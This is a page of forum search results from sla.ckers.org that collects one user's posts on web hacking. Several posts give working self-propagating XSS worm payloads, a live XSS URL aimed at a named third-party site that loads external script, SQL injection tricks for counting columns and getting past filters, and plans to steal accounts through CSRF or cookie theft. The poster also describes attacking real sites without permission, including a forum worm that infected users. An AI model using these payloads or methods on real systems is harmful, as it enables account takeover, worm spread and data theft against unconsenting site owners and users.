Sla.ckers.org
This group should mostly be dealing with how web applications enable networking security issues that are otherwise not there. Everything is being tunneled over port 80 now so what does that enable and how do we fix it? 

Results 1 - 30 of 74
5 years ago
Spikeman
I'm exploiting a site with a similar LFI vulnerability. Magic_quotes is on, so it escapes the null-byte. I attempted the sled method, but the include isn't loaded and the rest of the page isn't loaded as well. Is there any way around this?
Forum: SQL and Code Injection
6 years ago
Spikeman
Reiners Wrote:
> However, if it was escaping quotes and not backslashes '\"' should be able to break out of the query.
>
> and does this work? I'm not sure what you are asking for because you already described the protection and the workaround ...

No, sorry I forgot to mention that esc
Forum: SQL and Code Injection
6 years ago
Spikeman
I've been trying to exploit a search function on an application that I know uses PHP and MySQL. What's strange is that quote characters seem to be escaped, but not backslashes. If I do a search for just a backslash it will return a string ending in '%'. From this I gather that the query is something like this: SELECT string FROM table LIKE "%$var%" Using a backslash seems to be
Forum: SQL and Code Injection
6 years ago
Spikeman
Isn't working for me.
Forum: XSS Info
6 years ago
Spikeman
So a polymorphic worm? That'd be cool. It'd be fun to code as well.
Forum: XSS Info
6 years ago
Spikeman
Quote:
> I once wrote an xss worm on a forum based on a flaw in a javascript code (it called unescape on info from the user's signature). I had it add its code as well as a bit of invisible text as a payload and it took several weeks before it was discovered. By that time every active member of the forum had the worm in their signature. The admin must have discovered what the source of the problem wa
Forum: XSS Info
6 years ago
Spikeman
One idea I toyed with once was set up an XSS worm with script hosted somewhere externally that you control. Let it propagate completely silently for a while. Once it is fairly widespread change the code to add the payload. The only flaw to this method is users may notice their browser accessing a domain they haven't seen before which will draw suspicion. One idea that is sort of similar that w
Forum: XSS Info
6 years ago
Spikeman
@rsnake: I once wrote an xss worm on a forum based on a flaw in a javascript code (it called unescape on info from the user's signature). I had it add its code as well as a bit of invisible text as a payload and it took several weeks before it was discovered. By that time every active member of the forum had the worm in their signature. The admin must have discovered what the source of the pro
Forum: XSS Info
6 years ago
Spikeman
My entry (doesn't work with doctype, can someone explain why?): <form><input id="c" name="content"><img onerror="with(c)with(parentNode)alert('xss',submit(value='<form>'+innerHTML,action=(method='post')+'.php'))" src=" 154 bytes, it grows but the first 154 chars stay the same (so it could work with a limit of 154).
Forum: XSS Info
6 years ago
Spikeman
.mario, your 125 has to be tweaked to the following, 132 bytes to actually work. <form id=i><button onclick="i.action=(i.method='post')+'.php';value='<form id=i>'+i.innerHTML;alert('XSS')" name="content"></button> It does pick up additional content but this wouldn't matter in this case as it would stay the same if truncated.
Forum: XSS Info
6 years ago
Spikeman
143 bytes: <form id=z><input name=content><script>with(z)alert('XSS',submit(action=(method='post')+'.php',content.value='<form id=z>'+innerHTML))</script> Tested in Firefox and IE, quotes are added to make name="content" second time and after. It worked fine with content around it in my tests so the substring was unnecessary. Edit: I guess the added
Forum: XSS Info
6 years ago
Spikeman
Two questions: 1) It doesn't have to be transparent does it? 2) Does the length of the replicated worm matter? (Does it have to submit the same thing every time?)
Forum: XSS Info
6 years ago
Spikeman
You need to keep doing the ORDER BY x until you get an error. So you'd do ORDER BY 2, ORDER BY 3, ORDER BY 4, and if it erred on ORDER BY 5 you'd know it had 4 columns. Just fill the rest with nulls.
Forum: SQL and Code Injection
6 years ago
Spikeman
It's a union injection so I'm pretty sure I do need select, I tried sElecT and variants and it still didn't work. I am breaking out of a where clause so I could use blind injection techniques if I can't get select working.
Forum: SQL and Code Injection
6 years ago
Spikeman
I found an SQL injection in a website but when "SELECT" is in the URL as all the server returns a 403. Is there a way to obfuscate this? I know about using char() and concat() and such, but I doubt it will work with SELECT (going to try it now anyway).
Forum: SQL and Code Injection
7 years ago
Spikeman
PHP doesn't allow query stacking and the earlier query you posted is invalid. In short, it's impossible (as far as I know) with a site that uses PHP (which I'm assuming this does).
Forum: SQL and Code Injection
7 years ago
Spikeman
http://www.soul-reply.net/tamashi/country.php?id=%3Cscript%20src=http://ckers.org/s%3E%3C/script%3E
Forum: Full Disclosure
7 years ago
Spikeman
That actually doesn't work, I get this: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'select/**/password/**/from/**/user/**/where/**/id=1)/*', 'Mozilla/5.0 (Windows; ' at line 1 I think that it just parses the comments as nothing, not spaces. Is there some function like eval?
Forum: SQL and Code Injection
7 years ago
Spikeman
I found an SQL injection where I can inject in a query that logs views to the site, so my injection point is something like this (the server's running the latest MySQL I believe): h ttp://site.com/?','useragent here')/* This injects into an insert clause. Now to make this actually useful, I want to be able to do something like this: h ttp://site.com/?',SELECT password FROM users WHERE id=
Forum: SQL and Code Injection
7 years ago
Spikeman
There's no way to log in as a user by stealing their cookie unless you can spoof your IP and your user agent to be the same as theirs.
Forum: Full Disclosure
7 years ago
Spikeman
http://photobucket.com/images/0;url=HACKER%22http-equiv=refresh%3E Can't quite get it to work right yet. Using forward slashes break it. I tried to get it to redirect to a picture in my album, but it escapes the quote so it doesn't work right.
Forum: Full Disclosure
7 years ago
Spikeman
bubbles Wrote:
> It's stored in their cookie, so if you can steal that you can get it.

Only if they chose "Remember Me" though. You could use AJAX and have them send out one of those Invite My Friends to your email. That would get you their email probably. Both that and stealing their cookie assume you can find a hol
Forum: Full Disclosure
7 years ago
Spikeman
Not to mention MySpace needs a password to change email.. (yeah I've looked into it ;) Edit: And also a CAPTCHA if I'm not mistaken..
Forum: Full Disclosure
7 years ago
Spikeman
A while ago I was having the same issue and I recommended RSnake make http://ckers.org/s point to the Stallowned thing, and he did. So <script src=//ckers.org/s> maybe? Also, if you are able to inject more than one place on the page you could inject <script src=//ckers.org/s> in the first and the closing script tag in the second. I did this in a highscores table for some online game.
Forum: XSS Info
7 years ago
Spikeman
%0010000
Forum: OMG Ponies
7 years ago
Spikeman
Here's an interesting idea I had today: Code an open-source web site without security, for example a forum in PHP. Then provide the source, and have hackers (that's where you all come in) find exploits. Write a simple patch for every exploit that is found. Theoretically, in the end you would be left with a secure piece of software. Does this sound realistic? A good way to implement this would b
Forum: Projects
7 years ago
Spikeman
Well first of all, you don't filter XSS in any of the fields upon registration, as far as I'm aware. My username (and everything else) is "<script>alert('xss!')</script>".
Forum: Projects
7 years ago
Spikeman
I'm not sure if this is the right place to post this, but my buddy needs help executing a DNS Cache Poisoning attack on his employer's nameservers. Don't mistake this for a malicious attack! After scanning their DNS and finding that it's open to the internet as well as vulnerable to DNS Cache Poisoning and telling them, they said it wasn't a big problem. So he wants to prove that it is. I've been
Forum: Networking
7 years ago
Spikeman
The vector I'm using actually isn't a vulnerability in IPB, it's a vulnerability in a Javascript code used on forums from the free forum provider http://invisionfree.com/. It actually took me a while to find a site with the code on it because one of InvisionFree's servers crashed a little while back and most lost the code. But I'm sure there are other codes that would work. I ended up making a
Forum: CSRF and Session Info
7 years ago
Spikeman
I did just want to log in as them, but I guess you're right, IP spoofing seems to be a nearly impossible option, unless I got lucky. So I guess I'll work on a CSRF using XMLHTTPRequest. So what would be the best CSRF if I wanted to steal an account? One that changed their password and logged who it changed? One that changed their email to mine, requests a lost password, and then changes it back?
Forum: CSRF and Session Info